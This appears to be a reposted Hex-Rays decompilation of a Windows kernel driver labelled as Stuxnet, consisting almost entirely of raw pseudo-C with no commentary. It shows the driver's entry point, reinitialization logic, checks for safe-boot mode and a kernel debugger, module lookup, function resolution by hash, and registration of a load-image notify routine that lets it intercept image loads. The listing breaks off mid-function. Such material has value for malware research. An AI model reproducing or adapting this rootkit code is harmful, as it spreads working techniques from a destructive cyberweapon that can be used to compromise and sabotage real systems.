Stuxnet(Do Not Open!)

161
#include <windows.h> #include <defs.h> //-------------------------------------------------------------------- ----- // Data declarations extern const WCHAR aSystemrootSyst[]; // idb extern char dword_124C0[]; // idb extern char dword_124D0[]; // idb extern wchar_t aKernel32_dll[13]; // weak // extern PBOOLEAN KdDebuggerEnabled; // extern void *InitSafeBootMode; weak extern int dword_12628; // weak extern char byte_12630[]; // weak extern _BYTE byte_12644[20]; // idb extern int dword_12658; // weak extern char a_text[6]; // weak extern char aPage[5]; // weak extern char asc_12678[2]; // weak extern size_t dword_12680; // idb extern int dword_12684; // weak extern int dword_12688; // weak extern int dword_1268C; // weak

Transcript of Stuxnet(Do Not Open!)

#include <windows.h>#include <defs.h>//-------------------------------------------------------------------------

// Data declarations

extern const WCHAR aSystemrootSyst[]; // idb

extern char dword_124C0[]; // idb

extern char dword_124D0[]; // idb

extern wchar_t aKernel32_dll[13]; // weak

// extern PBOOLEAN KdDebuggerEnabled;

// extern void *InitSafeBootMode; weak

extern int dword_12628; // weak

extern char byte_12630[]; // weak

extern _BYTE byte_12644[20]; // idb

extern int dword_12658; // weak

extern char a_text[6]; // weak

extern char aPage[5]; // weak

extern char asc_12678[2]; // weak

extern size_t dword_12680; // idb

extern int dword_12684; // weak

extern int dword_12688; // weak

extern int dword_1268C; // weak

extern int dword_12690; // weak

extern _UNKNOWN unk_12694; // weak

extern _UNKNOWN unk_12EB8; // weak

extern _UNKNOWN unk_14380; // weak

extern _UNKNOWN unk_14384; // weak

extern char byte_14390; // weak

extern int dword_14391; // weak

extern const WCHAR word_14395; // idb

extern const WCHAR word_1445D; // idb

extern const WCHAR word_14471; // idb

extern int dword_14539; // weak

extern int dword_1453D; // weak

extern const WCHAR SourceString; // idb

extern char byte_14614; // weak

extern char byte_14615; // weak

extern char byte_14616; // weak

extern char byte_14617; // weak

extern int dword_1461C; // weak

extern int dword_14620; // weak

extern int dword_14624; // weak

extern char byte_14628; // weak

extern RTL_GENERIC_TABLE Table; // idb

extern int dword_14654; // weak

extern char byte_14658; // weak

extern int dword_1465C; // weak

extern int dword_14660; // weak

extern char byte_14664; // weak

extern int dword_14668; // weak

extern struct _KMUTANT Mutex; // idb

extern int dword_1468C; // weak

extern int dword_14690; // weak

extern int dword_14694; // weak

extern int dword_14698; // weak

extern int dword_1469C; // weak

extern int dword_146A0; // weak

extern int dword_146A4; // weak

extern int dword_146A8; // weak

extern int dword_146AC; // weak

extern int dword_146B0; // weak

//-------------------------------------------------------------------------

// Function declarations

#define __thiscall __cdecl // Test compile in C mode

char __cdecl sub_10300();

void __stdcall DriverReinitializationRoutine(PDRIVER_OBJECT DriverObject, int a2, unsigned int a3);

NTSTATUS __stdcall DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath);

int __stdcall sub_1048A(int a1);

int __cdecl sub_10542();

// int __usercall sub_1056C<eax>(int a1<esi>);

// int __userpurge sub_105A0<eax>(int a1<ebx>, SIZE_T a2<edi>, int a3<esi>, const void *a4);

// int __usercall sub_105E4<eax>(LSA_UNICODE_STRING *a1<ecx>, int a2<edi>, int a3<esi>);

ULONG __thiscall sub_10638(LSA_UNICODE_STRING *this, ULONG a2, int a3);

// void __userpurge sub_1076E(int a1<ebx>, PVOID *a2);

signed int __fastcall sub_107A2(int a1, int a2);

int *__cdecl sub_107E8();

bool __stdcall sub_10886(int a1);

int __stdcall sub_108BE(const char *a1);

int __cdecl sub_1098E();

// signed int __usercall sub_109B0<eax>(int a1<edi>);

int __cdecl sub_10A3A();

// int __usercall sub_10A8A<eax>(int a1<edi>, int *a2<esi>);

// int __usercall sub_10AE2<eax>(int a1<esi>);

// int __usercall sub_10B36<eax>(int a1<esi>);

int __thiscall sub_10B68(int this);

int __stdcall sub_10BA2(int, int); // weak

signed int __cdecl sub_10BE8();

// int __userpurge sub_10BEC<eax>(int a1<ebp>, int a2, int a3);

// signed int __usercall sub_10C22<eax>(int a1<eax>);

signed int __stdcall sub_10CFE(int a1, int a2);

// void __usercall sub_10D7E(int a1<eax>);

// int __usercall sub_10DA8<eax>(int a1<ecx>, int a2<edi>, int a3<esi>);

void __stdcall sub_10DCC(int a1, HANDLE Handle, int a3);

void __stdcall NotifyRoutine(int a1, HANDLE Handle, int a3);

// int __userpurge sub_10FC4<eax>(int result<eax>, int a2);

RTL_GENERIC_TABLE *__cdecl sub_10FE6();

// PVOID __usercall sub_11028<eax>(int a1<eax>, RTL_GENERIC_TABLE *a2<edi>);

// signed int __usercall sub_11066<eax>(int a1<eax>, RTL_GENERIC_TABLE *a2<edi>);

// signed int __userpurge sub_110C0<eax>(RTL_GENERIC_TABLE *a1<eax>, int *a2);

bool __stdcall CompareRoutine(int a1, int a2, int a3);

PVOID __stdcall AllocateRoutine(int a1, SIZE_T NumberOfBytes);

void __stdcall FreeRoutine(int a1, PVOID P);

// int __usercall sub_1118A<eax>(int a1<ebx>, int a2<esi>);

// int __userpurge sub_111B4<eax>(int a1<eax>, int a2<ebx>, int a3);

// signed int __userpurge sub_11242<eax>(int a1<eax>, int a2, int a3);

// PVOID __userpurge sub_113C2<eax>(int a1<edi>, int a2, int a3);

// void __userpurge sub_1141E(int a1<eax>, int a2<ecx>, int a3<ebx>, int a4, int a5);

void __fastcall sub_114EC(int a1, int a2, int a3, int a4, int a5);

LONG_PTR __stdcall sub_11522(int a1, int a2, int a3, int a4, int a5);

PVOID __stdcall sub_11578(int a1);

PVOID __stdcall sub_11598(int a1);

// signed int __userpurge sub_115CC<eax>(const void *a1<eax>, int a2<ebx>, int a3);

signed int __thiscall sub_11718(int this, int a2, const void *a3);

__int32 __stdcall sub_1174A(int a1, int a2);

// char __usercall sub_117A8<al>(WCHAR *a1<eax>, int a2<ecx>);

// PVOID __usercall sub_1182C<eax>(ULONG a1<esi>);

// int __usercall sub_11864<eax>(HANDLE *a1<edi>);

signed int __stdcall sub_118E2(unsigned int a1, int a2);

char __fastcall sub_119AE(int a1, int a2);

// char __usercall sub_11A08<al>(int a1<edi>);

// int __userpurge sub_11A4A<eax>(int a1<eax>, int a2<ebx>, unsigned int a3);

// const char *__usercall sub_11ABC<eax>(const char *result<eax>, int a2<ecx>);

int __stdcall sub_11B04(int a1, const char *a2, unsigned int a3, int a4, int a5);

int *__cdecl sub_11C14();

int __stdcall sub_11CCC(int a1);

char __stdcall sub_11D46(int a1, unsigned int a2);

// NTSTATUS __userpurge sub_11D62<eax>(LSA_UNICODE_STRING *a1<eax>, PUNICODE_STRING ValueName, int a3);

int __stdcall sub_11DD6(int, PUNICODE_STRING ValueName, int); // idb

// int __usercall sub_11EC6<eax>(char a1<al>, int a2<ecx>, unsigned int a3<esi>);

int __stdcall sub_11F42(int, int, HANDLE Handle); // idb

// int __userpurge sub_11FC0<eax>(int a1<esi>, int a2, int a3);

int __stdcall sub_12000(HANDLE Handle, PVOID ProcessInformation); // idb

// int __userpurge sub_12094<eax>(int a1<ebx>, int a2<edi>, int a3);

// LONG_PTR __usercall sub_120CC<eax>(PVOID Object<ecx>, LONG_PTR result<eax>);

int __cdecl sub_120DE(int a1);

int __cdecl sub_1210F(int a1, unsigned int a2);

// signed int __usercall sub_1216B<eax>(int a1<eax>, unsigned int a2<ebx>);

signed int __cdecl sub_121E1(int a1, int a2, int a3);

signed int __cdecl sub_122B3(int a1, unsigned int a2);

bool __cdecl sub_122D0(int a1, unsigned int a2, int a3, int a4);

// signed int __usercall sub_12323<eax>(unsigned int a1<eax>, int a2, int a3, unsigned __int16 a4);

signed int __cdecl sub_1236B(int a1, int a2);

// NTSTATUS __stdcall ZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);

// void *__cdecl memcpy(void *, const void *, size_t);

// void *__cdecl memset(void *, int, size_t);

// int _SEH_epilog(void); weak

int nullsub_1(); // weak

int nullsub_2(); // weak

int sub_124FE(); // weak

int nullsub_3(); // weak

// KIRQL __fastcall KfAcquireSpinLock(PKSPIN_LOCK SpinLock);

// KIRQL __stdcall KeGetCurrentIrql();

// void __fastcall KfReleaseSpinLock(PKSPIN_LOCK SpinLock, KIRQL NewIrql);

// NTSTATUS __stdcall ZwReadFile(HANDLE FileHandle, HANDLE Event, PIO_APC_ROUTINE ApcRoutine, PVOID ApcContext, PIO_STATUS_BLOCK IoStatusBlock, PVOID Buffer, ULONG Length, PLARGE_INTEGER ByteOffset, PULONG Key);

// NTSTATUS __stdcall ZwClose(HANDLE Handle);

// NTSTATUS __stdcall ZwOpenFile(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, ULONG ShareAccess, ULONG OpenOptions);

// NTSTATUS __stdcall ZwQueryInformationFile(HANDLE FileHandle, PIO_STATUS_BLOCK IoStatusBlock, PVOID FileInformation, ULONG Length, FILE_INFORMATION_CLASS FileInformationClass);

// BOOLEAN __stdcall PsGetVersion(PULONG MajorVersion, PULONG MinorVersion, PULONG BuildNumber, PUNICODE_STRING CSDVersion);

// int __cdecl stricmp(const char *, const char *);

// NTSTATUS __stdcall PsSetLoadImageNotifyRoutine(PLOAD_IMAGE_NOTIFY_ROUTINE NotifyRoutine);

// PVOID __stdcall ExAllocatePool(POOL_TYPE PoolType, SIZE_T NumberOfBytes);

// void __fastcall IofCompleteRequest(PIRP Irp, CCHAR PriorityBoost);

// NTSTATUS __stdcall IoCreateDevice(PDRIVER_OBJECT DriverObject, ULONG DeviceExtensionSize, PUNICODE_STRING DeviceName, ULONG DeviceType, ULONG DeviceCharacteristics, BOOLEAN Exclusive, PDEVICE_OBJECT *DeviceObject);

// BOOLEAN __stdcall RtlDeleteElementGenericTable(PRTL_GENERIC_TABLE Table, PVOID Buffer);

// PKTHREAD __stdcall KeGetCurrentThread();

// PVOID __stdcall RtlLookupElementGenericTable(PRTL_GENERIC_TABLE Table, PVOID Buffer);

// void __stdcall RtlInitializeGenericTable(PRTL_GENERIC_TABLE Table, PRTL_GENERIC_COMPARE_ROUTINE CompareRoutine, PRTL_GENERIC_ALLOCATE_ROUTINE AllocateRoutine, PRTL_GENERIC_FREE_ROUTINE FreeRoutine, PVOID TableContext);

// PVOID __stdcall RtlInsertElementGenericTable(PRTL_GENERIC_TABLE Table, PVOID Buffer, CLONG BufferSize, PBOOLEAN NewElement);

// WCHAR __stdcall RtlUpcaseUnicodeChar(WCHAR SourceCharacter);

// NTSTATUS __stdcall ZwAllocateVirtualMemory(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG ZeroBits, PULONG AllocationSize, ULONG AllocationType, ULONG Protect);

// void __stdcall RtlInitUnicodeString(PUNICODE_STRING DestinationString, PCWSTR SourceString);

// void __stdcall IoRegisterDriverReinitialization(PDRIVER_OBJECT DriverObject, PDRIVER_REINITIALIZE DriverReinitializationRoutine, PVOID Context);

// void __stdcall ExFreePoolWithTag(PVOID P, ULONG Tag);

// void __stdcall KeInitializeMutex(PRKMUTEX Mutex, ULONG Level);

// LONG __stdcall KeReleaseMutex(PRKMUTEX Mutex, BOOLEAN Wait);

// NTSTATUS __stdcall KeWaitForSingleObject(PVOID Object, KWAIT_REASON WaitReason, KPROCESSOR_MODE WaitMode, BOOLEAN Alertable, PLARGE_INTEGER Timeout);

// NTSTATUS __stdcall ZwQueryValueKey(HANDLE KeyHandle, PUNICODE_STRING ValueName, KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass, PVOID KeyValueInformation, ULONG Length, PULONG ResultLength);

// NTSTATUS __stdcall ZwOpenKey(PHANDLE KeyHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);

// int __stdcall KeUnstackDetachProcess(_DWORD); weak

// int __stdcall KeStackAttachProcess(_DWORD, _DWORD); weak

// NTSTATUS __stdcall ZwQueryInformationProcess(HANDLE ProcessHandle, PROCESSINFOCLASS ProcessInformationClass, PVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength);

// int __stdcall ObOpenObjectByPointer(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD); weak

// int __stdcall PsLookupProcessByProcessId(_DWORD, _DWORD); weak

// LONG_PTR __fastcall ObfDereferenceObject(PVOID Object);

// signed int __usercall sub_12A24<eax>(int a1<esi>);

signed int __cdecl sub_12A95(int a1);

// bool __usercall sub_12D37<eax>(int a1<eax>, int a2);

int __thiscall sub_12D71(void *this);

// signed int __usercall sub_13343<eax>(int a1<eax>, unsigned int a2);

// int __usercall sub_133BF<eax>(int a1<eax>, int a2, int a3);

// int __usercall sub_13409<eax>(int a1<eax>, int a2, int a3, int a4);

// int __usercall sub_1356E<eax>(unsigned int *a1<eax>, int a2<ebx>, int a3<edi>, int a4, int a5, int a6);

int __thiscall sub_1369C(void *this);

signed int __cdecl sub_136F8(int a1, int a2, int a3);

signed int __cdecl sub_138BE(int a1, unsigned int a2);

bool __cdecl sub_138DB(int a1, unsigned int a2, int a3, int a4);

int __cdecl sub_1392E(int a1);

// signed int __usercall sub_13A4B<eax>(unsigned int a1<eax>, int a2, int a3, unsigned __int16 a4);

// signed int __usercall sub_13B3A<eax>(int a1<eax>, unsigned int a2<ebx>);

// int __usercall sub_13BF1<eax>(unsigned int a1<eax>, int a2<ecx>, int a3, int a4, int a5);

// signed int __usercall sub_13C66<eax>(int a1<eax>, int a2<edx>, int a3<ecx>, unsigned int a4);

int __cdecl sub_13C92(int a1, char a2, int a3);

// int __usercall sub_13CC0<eax>(int a1<eax>, int a2<edx>);

// signed int __usercall sub_13D8E<eax>(int a1<eax>, int a2, int a3, unsigned int a4, int (__cdecl *a5)(_DWORD, _DWORD, _DWORD));

//----- (00010300) --------------------------------------------------------

char __cdecl sub_10300()

{

LSA_UNICODE_STRING DestinationString; // [sp+8h] [bp-18h]@1

char v2; // [sp+10h] [bp-10h]@1

HANDLE Handle; // [sp+14h] [bp-Ch]@2

int v4; // [sp+18h] [bp-8h]@1

char v5; // [sp+1Fh] [bp-1h]@1

RtlInitUnicodeString(&DestinationString, L"\\SystemRoot\\System32\\hal.dll");

v4 = 0;

sub_105E4(&DestinationString, (int)&v4, (int)&v2);

v5 = v4 == 0;

if ( v2 )

{

v2 = 0;

ZwClose(Handle);

}

return v5;

}

//----- (0001034C) --------------------------------------------------------

void __stdcall DriverReinitializationRoutine(PDRIVER_OBJECT DriverObject, int a2, unsigned int a3)

{

if ( !KeGetCurrentIrql() )

{

if ( a3 <= 0x65 )

{

if ( !sub_10542() )

{

if ( sub_10300() )

sub_10A3A();

else

IoRegisterDriverReinitialization(DriverObject, DriverReinitializationRoutine, 0);

}

}

}

}

//----- (000103AA) --------------------------------------------------------

NTSTATUS __stdcall DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)

{

signed int v2; // eax@2

LSA_UNICODE_STRING DestinationString; // [sp+Ch] [bp-24h]@11

unsigned int i; // [sp+14h] [bp-1Ch]@3

CPPEH_RECORD ms_exc; // [sp+18h] [bp-18h]@1

ms_exc.disabled = 0;

dword_14624 = 128;

dword_1461C = (int)ExAllocatePool(0, 0x200u);

if ( dword_1461C )

{

byte_14628 = 1;

for ( i = (unsigned int)&unk_14380; i < (unsigned int)&unk_14384; i += 4 )

{

if ( *(_DWORD *)i )

(*(void (**)(void))i)();

}

v2 = 0;

}

else

{

v2 = -1073741823;

}

if ( !v2 )

{

if ( !sub_109B0((int)RegistryPath) )

{

RtlInitUnicodeString(&DestinationString, &SourceString);

if ( !IoCreateDevice(DriverObject, 0, &DestinationString, 0x22u, 0x100u, 0, (PDEVICE_OBJECT *)&RegistryPath) )

{

DriverObject->MajorFunction[0] = (PDRIVER_DISPATCH)sub_10BA2;

DriverObject->MajorFunction[2] = (PDRIVER_DISPATCH)sub_10BA2;

DriverObject->MajorFunction[14] = (PDRIVER_DISPATCH)sub_10BA2;

RegistryPath[3].Buffer = (PWSTR)((unsigned int)RegistryPath[3].Buffer & 0xFFFFFF7F);

IoRegisterDriverReinitialization(DriverObject, (PDRIVER_REINITIALIZE)DriverReinitializationRoutine, 0);

}

}

}

return 0;

}

// 10BA2: using guessed type int __stdcall sub_10BA2(int, int);

// 1461C: using guessed type int dword_1461C;

// 14624: using guessed type int dword_14624;

// 14628: using guessed type char byte_14628;

//----- (0001048A) --------------------------------------------------------

int __stdcall sub_1048A(int a1)

{

int v1; // edi@5

int result; // eax@7

int (*v3)(void); // edi@11

int v4; // [sp+Ch] [bp-128h]@6

__int16 v5; // [sp+120h] [bp-14h]@9

int v6; // [sp+130h] [bp-4h]@3

*(_BYTE *)a1 = 1;

if ( !KeGetCurrentIrql() )

{

sub_1056C((int)&v6);

if ( sub_10886(0) || sub_10886(1) )

return 0;

v1 = v6;

if ( sub_10886(2) )

{

memset(&v4, 255, 0x11Cu);

v4 = 284;

if ( !*(_DWORD *)v1 )

return -1073741823;

result = (*(int (__stdcall **)(int *))v1)(&v4);

if ( result )

return result;

if ( !v5 )

return *(_DWORD *)(v1 + 4) != 0 ? 0xC0000001 : 0;

}

v3 = *(int (**)(void))(v1 + 4);

if ( v3 )

{

if ( (unsigned __int8)v3() )

*(_BYTE *)a1 = 0;

return 0;

}

return -1073741823;

}

*(_BYTE *)a1 = 0;

return 0;

}

//----- (00010542) --------------------------------------------------------

int __cdecl sub_10542()

{

int result; // eax@1

char v1; // [sp+7h] [bp-1h]@1

v1 = 0;

result = sub_1048A((int)&v1);

if ( !result )

result = (v1 != 0 ? 0x3FFFFFFF : 0) - 1073741823;

return result;

}

//----- (0001056C) --------------------------------------------------------

int __usercall sub_1056C<eax>(int a1<esi>)

{

int v1; // ecx@2

*(_DWORD *)a1 = 0;

if ( !(dword_146A4 & 1) )

{

dword_146A4 |= 1u;

sub_107E8();

sub_107A2(v1, (int)nullsub_1);

}

byte_14614 = 0;

*(_DWORD *)a1 = &dword_14694;

return a1;

}

// 124FA: using guessed type int nullsub_1();

// 14614: using guessed type char byte_14614;

// 14694: using guessed type int dword_14694;

// 146A4: using guessed type int dword_146A4;

//----- (000105A0) --------------------------------------------------------

int __userpurge sub_105A0<eax>(int a1<ebx>, SIZE_T a2<edi>, int a3<esi>, const void *a4)

{

PVOID v4; // eax@1

char v5; // zf@1

v4 = ExAllocatePool(0, a2);

v5 = *(_DWORD *)a1 == 0;

*(_DWORD *)a3 = v4;

*(_DWORD *)(a3 + 4) = a2;

*(_DWORD *)(a3 + 8) = v4;

*(_DWORD *)(a3 + 12) = a2;

if ( v5 )

{

if ( *(_DWORD *)a3 )

{

if ( a4 )

memcpy(*(void **)a3, a4, a2);

}

else

{

*(_DWORD *)a1 = -1073741823;

}

}

return a3;

}

//----- (000105E4) --------------------------------------------------------

int __usercall sub_105E4<eax>(LSA_UNICODE_STRING *a1<ecx>, int a2<edi>, int a3<esi>)

{

char v3; // zf@1

NTSTATUS v4; // eax@2

OBJECT_ATTRIBUTES ObjectAttributes; // [sp+8h] [bp-20h]@2

struct _IO_STATUS_BLOCK IoStatusBlock; // [sp+20h] [bp-8h]@2

v3 = *(_DWORD *)a2 == 0;

*(_BYTE *)a3 = 0;

*(_DWORD *)(a3 + 4) = 0;

if ( v3 )

{

ObjectAttributes.ObjectName = a1;

ObjectAttributes.Length = 24;

ObjectAttributes.RootDirectory = 0;

ObjectAttributes.Attributes = 576;

ObjectAttributes.SecurityDescriptor = 0;

ObjectAttributes.SecurityQualityOfService = 0;

v4 = ZwOpenFile((PHANDLE)(a3 + 4), 0x80100000u, &ObjectAttributes, &IoStatusBlock, 1u, 0x60u);

*(_DWORD *)a2 = v4;

*(_BYTE *)a3 = v4 == 0;

}

return a3;

}

//----- (00010638) --------------------------------------------------------

ULONG __thiscall sub_10638(LSA_UNICODE_STRING *this, ULONG a2, int a3)

{

char v3; // bl@1

ULONG result; // eax@4

HANDLE v5; // ecx@6

ULONG v6; // edi@6

ULONG v7; // esi@6

NTSTATUS v8; // eax@7

int v9; // eax@17

int v10; // eax@18

void **v11; // eax@21

void *v12; // eax@22

char FileInformation; // [sp+10h] [bp-28h]@7

ULONG v14; // [sp+18h] [bp-20h]@7

void *v15; // [sp+1Ch] [bp-1Ch]@7

ULONG Length; // [sp+28h] [bp-10h]@1

HANDLE Handle; // [sp+2Ch] [bp-Ch]@3

struct _IO_STATUS_BLOCK IoStatusBlock; // [sp+30h] [bp-8h]@1

v3 = 0;

IoStatusBlock.Information = 0;

sub_105E4(this, (int)&IoStatusBlock.Information, (int)&Length);

if ( IoStatusBlock.Information )

goto LABEL_2;

if ( (_BYTE)Length )

{

v8 = ZwQueryInformationFile(Handle, &IoStatusBlock, &FileInformation, 0x18u, FileStandardInformation);

v6 = v14;

v5 = v15;

v7 = v8;

}

else

{

v5 = Handle;

v6 = Length;

v7 = -1073741823;

}

IoStatusBlock.Information = v7;

if ( v7 )

goto LABEL_9;

if ( v5 || v6 > a2 )

goto LABEL_31;

v9 = (int)ExAllocatePool(0, 0x10u);

if ( v9 )

v10 = sub_105A0((int)&IoStatusBlock.Information, v6, v9, 0);

else

v10 = 0;

sub_1076E(a3, (PVOID *)v10);

v3 = 0;

if ( IoStatusBlock.Information )

{

LABEL_2:

if ( (_BYTE)Length != v3 )

{

LOBYTE(Length) = v3;

ZwClose(Handle);

}

return IoStatusBlock.Information;

}

v11 = *(void ***)(a3 + 4);

if ( !v11 )

goto LABEL_31;

v12 = *v11;

if ( !(_BYTE)Length )

return -1073741823;

v7 = ZwReadFile(Handle, 0, 0, 0, &IoStatusBlock, v12, v6, 0, 0);

if ( v7 )

{

LABEL_9:

if ( (_BYTE)Length != v3 )

{

LOBYTE(Length) = v3;

ZwClose(Handle);

}

return v7;

}

if ( IoStatusBlock.Information != v6 )

{

LABEL_31:

if ( (_BYTE)Length != v3 )

{

LOBYTE(Length) = v3;

ZwClose(Handle);

}

result = -1073741823;

}

else

{

if ( (_BYTE)Length )

{

LOBYTE(Length) = 0;

ZwClose(Handle);

}

result = 0;

}

return result;

}

//----- (0001076E) --------------------------------------------------------

void __userpurge sub_1076E(int a1<ebx>, PVOID *a2)

{

PVOID *v2; // esi@1

v2 = *(PVOID **)(a1 + 4);

if ( a2 != v2 )

{

if ( v2 )

{

if ( *v2 )

ExFreePoolWithTag(*v2, 0);

ExFreePoolWithTag(v2, 0);

}

*(_DWORD *)(a1 + 4) = a2;

}

}

//----- (000107A2) --------------------------------------------------------

signed int __fastcall sub_107A2(int a1, int a2)

{

signed int result; // eax@5

if ( !byte_14628 )

goto LABEL_9;

if ( !dword_1461C )

goto LABEL_9;

if ( dword_14624 <= dword_14620 )

goto LABEL_9;

_ECX = &dword_14620;

_EAX = 1;

__asm { lock xadd [ecx], eax }

if ( dword_14624 > _EAX )

{

*(_DWORD *)(dword_1461C + 4 * _EAX) = a2;

result = 0;

}

else

{

LABEL_9:

result = 1;

}

return result;

}

// 1461C: using guessed type int dword_1461C;

// 14620: using guessed type int dword_14620;

// 14624: using guessed type int dword_14624;

// 14628: using guessed type char byte_14628;

//----- (000107E8) --------------------------------------------------------

int *__cdecl sub_107E8()

{

int v0; // eax@2

char v2; // [sp+4h] [bp-20h]@3

dword_14694 = 0;

dword_14698 = 0;

dword_1469C = 0;

dword_146A0 = 0;

if ( !sub_10886(0) )

{

v0 = sub_1098E();

if ( v0 )

{

if ( !sub_121E1((int)&v2, v0, 1) )

{

dword_14694 = sub_1236B((int)&v2, -899745608);

dword_14698 = sub_1236B((int)&v2, -1332885072);

dword_1469C = sub_1236B((int)&v2, -2007787012);

dword_146A0 = sub_1236B((int)&v2, 1516803388);

}

}

}

return &dword_14694;

}

// 14694: using guessed type int dword_14694;

// 14698: using guessed type int dword_14698;

// 1469C: using guessed type int dword_1469C;

// 146A0: using guessed type int dword_146A0;

//----- (00010886) --------------------------------------------------------

bool __stdcall sub_10886(int a1)

{

ULONG MinorVersion; // [sp+0h] [bp-8h]@1

ULONG MajorVersion; // [sp+4h] [bp-4h]@1

MajorVersion = 0;

MinorVersion = 0;

PsGetVersion(&MajorVersion, &MinorVersion, 0, 0);

return MajorVersion == 5 && a1 == MinorVersion;

}

//----- (000108BE) --------------------------------------------------------

int __stdcall sub_108BE(const char *a1)

{

ULONG v1; // edi@3

PVOID v2; // esi@6

int v4; // edi@17

PVOID v5; // [sp-8h] [bp-3Ch]@5

ULONG v6; // [sp-4h] [bp-38h]@5

PVOID P; // [sp+10h] [bp-24h]@3

int SystemInformation; // [sp+20h] [bp-14h]@1

char *v9; // [sp+24h] [bp-10h]@3

int v10; // [sp+28h] [bp-Ch]@13

ULONG SystemInformationLength; // [sp+2Ch] [bp-8h]@1

SystemInformationLength = 0;

SystemInformation = 0;

if ( ZwQuerySystemInformation(SystemModuleInformation, &SystemInformation, 0, &SystemInformationLength) != -1073741820

|| !SystemInformationLength )

return 0;

v9 = 0;

sub_105A0((int)&v9, SystemInformationLength, (int)&P, 0);

v1 = 0;

if ( v9 )

{

if ( P )

{

v6 = 0;

v5 = P;

LABEL_9:

ExFreePoolWithTag(v5, v6);

}

return 0;

}

v2 = P;

if ( ZwQuerySystemInformation(SystemModuleInformation, P, SystemInformationLength, (PULONG)&SystemInformation) )

{

if ( !v2 )

return 0;

LABEL_8:

v6 = v1;

v5 = v2;

goto LABEL_9;

}

if ( *(_DWORD *)v2 <= 0u )

goto LABEL_8;

v10 = 0;

v9 = (char *)v2 + 30;

while ( stricmp((const char *)v2 + v10 + *(_WORD *)v9 + 32, a1) )

{

v10 += 284;

v9 += 284;

++v1;

if ( v1 >= *(_DWORD *)v2 )

{

v1 = 0;

goto LABEL_8;

}

}

v4 = *((_DWORD *)v2 + 71 * v1 + 3);

ExFreePoolWithTag(v2, 0);

return v4;

}

//----- (0001098E) --------------------------------------------------------

int __cdecl sub_1098E()

{

int result; // eax@1

result = sub_108BE(dword_124C0);

if ( !result )

result = sub_108BE(dword_124D0);

return result;

}

//----- (000109B0) --------------------------------------------------------

signed int __usercall sub_109B0<eax>(int a1<edi>)

{

signed int result; // eax@8

if ( byte_14390 )

{

sub_11EC6(0, (int)&dword_14391, 0x278u);

byte_14390 = 0;

}

if ( !word_14395 )

{

if ( (unsigned int)*(_WORD *)a1 + 2 <= 0xC8 )

{

memset((void *)&word_14395, 0, 0xC8u);

memcpy((void *)&word_14395, *(const void **)(a1 + 4), *(_WORD *)a1);

}

}

if ( dword_14391 & 1 && InitSafeBootMode || dword_14391 & 2 && (_BYTE)KdDebuggerEnabled )

result = -1073741823;

else

result = 0;

return result;

}

// 125E4: using guessed type void *InitSafeBootMode;

// 14390: using guessed type char byte_14390;

// 14391: using guessed type int dword_14391;

//----- (00010A3A) --------------------------------------------------------

int __cdecl sub_10A3A()

{

int result; // eax@1

char v1; // [sp+8h] [bp-8h]@1

int v2; // [sp+Ch] [bp-4h]@1

v2 = 0;

sub_10A8A((int)&v1, &v2);

result = v2;

if ( !v2 )

{

sub_10AE2((int)&v2);

result = sub_10C22(v2);

if ( !result )

{

sub_10B36((int)&v1);

sub_1056C((int)&v1);

result = PsSetLoadImageNotifyRoutine((PLOAD_IMAGE_NOTIFY_ROUTINE)NotifyRoutine);

}

}

return result;

}

//----- (00010A8A) --------------------------------------------------------

int __usercall sub_10A8A<eax>(int a1<edi>, int *a2<esi>)

{

int v2; // eax@2

int v3; // ecx@4

*(_DWORD *)a1 = 0;

if ( !(dword_146B0 & 1) )

{

v2 = *a2;

dword_146B0 |= 1u;

dword_146AC = v2;

}

if ( !(dword_146B0 & 2) )

{

dword_146B0 |= 2u;

sub_11C14();

sub_107A2(v3, (int)nullsub_3);

}

if ( dword_146AC )

*a2 = dword_146AC;

else

*(_DWORD *)a1 = &dword_146A8;

byte_14615 = 0;

return a1;

}

// 12508: using guessed type int nullsub_3();

// 14615: using guessed type char byte_14615;

// 146A8: using guessed type int dword_146A8;

// 146AC: using guessed type int dword_146AC;

// 146B0: using guessed type int dword_146B0;

//----- (00010AE2) --------------------------------------------------------

int __usercall sub_10AE2<eax>(int a1<esi>)

{

int v1; // ecx@2

*(_DWORD *)a1 = 0;

if ( !(dword_14690 & 1) )

{

dword_14668 = 0;

dword_14690 |= 1u;

byte_14664 = 1;

memset(&Mutex, 0, sizeof(Mutex));

KeInitializeMutex(&Mutex, 0);

sub_107A2(v1, (int)sub_124FE);

}

byte_14616 = 0;

*(_DWORD *)a1 = &byte_14664;

return a1;

}

// 124FE: using guessed type int sub_124FE();

// 14616: using guessed type char byte_14616;

// 14664: using guessed type char byte_14664;

// 14668: using guessed type int dword_14668;

// 14690: using guessed type int dword_14690;

//----- (00010B36) --------------------------------------------------------

int __usercall sub_10B36<eax>(int a1<esi>)

{

int v1; // ecx@2

*(_DWORD *)a1 = 0;

if ( !(dword_1468C & 1) )

{

dword_1468C |= 1u;

sub_10FE6();

sub_107A2(v1, (int)nullsub_2);

}

byte_14617 = 0;

*(_DWORD *)a1 = &Table;

return a1;

}

// 124FC: using guessed type int nullsub_2();

// 14617: using guessed type char byte_14617;

// 1468C: using guessed type int dword_1468C;

//----- (00010B68) --------------------------------------------------------

int __thiscall sub_10B68(int this)

{

int result; // eax@3

int v2; // [sp+0h] [bp-4h]@1

v2 = this;

if ( *(_DWORD *)(*(_DWORD *)(this + 96) + 12) == 2242560 )

{

result = sub_11CCC(this);

}

else

{

if ( *(_DWORD *)(*(_DWORD *)(this + 96) + 12) == 2242564 )

{

sub_10AE2((int)&v2);

result = sub_10C22(v2);

}

else

{

result = -1073741822;

}

}

return result;

}

//----- (00010BE8) --------------------------------------------------------

signed int __cdecl sub_10BE8()

{

return 1;

}

//----- (00010BEC) --------------------------------------------------------

int __userpurge sub_10BEC<eax>(int a1<ebp>, int a2, int a3)

{

int v3; // edi@1

int v4; // esi@1

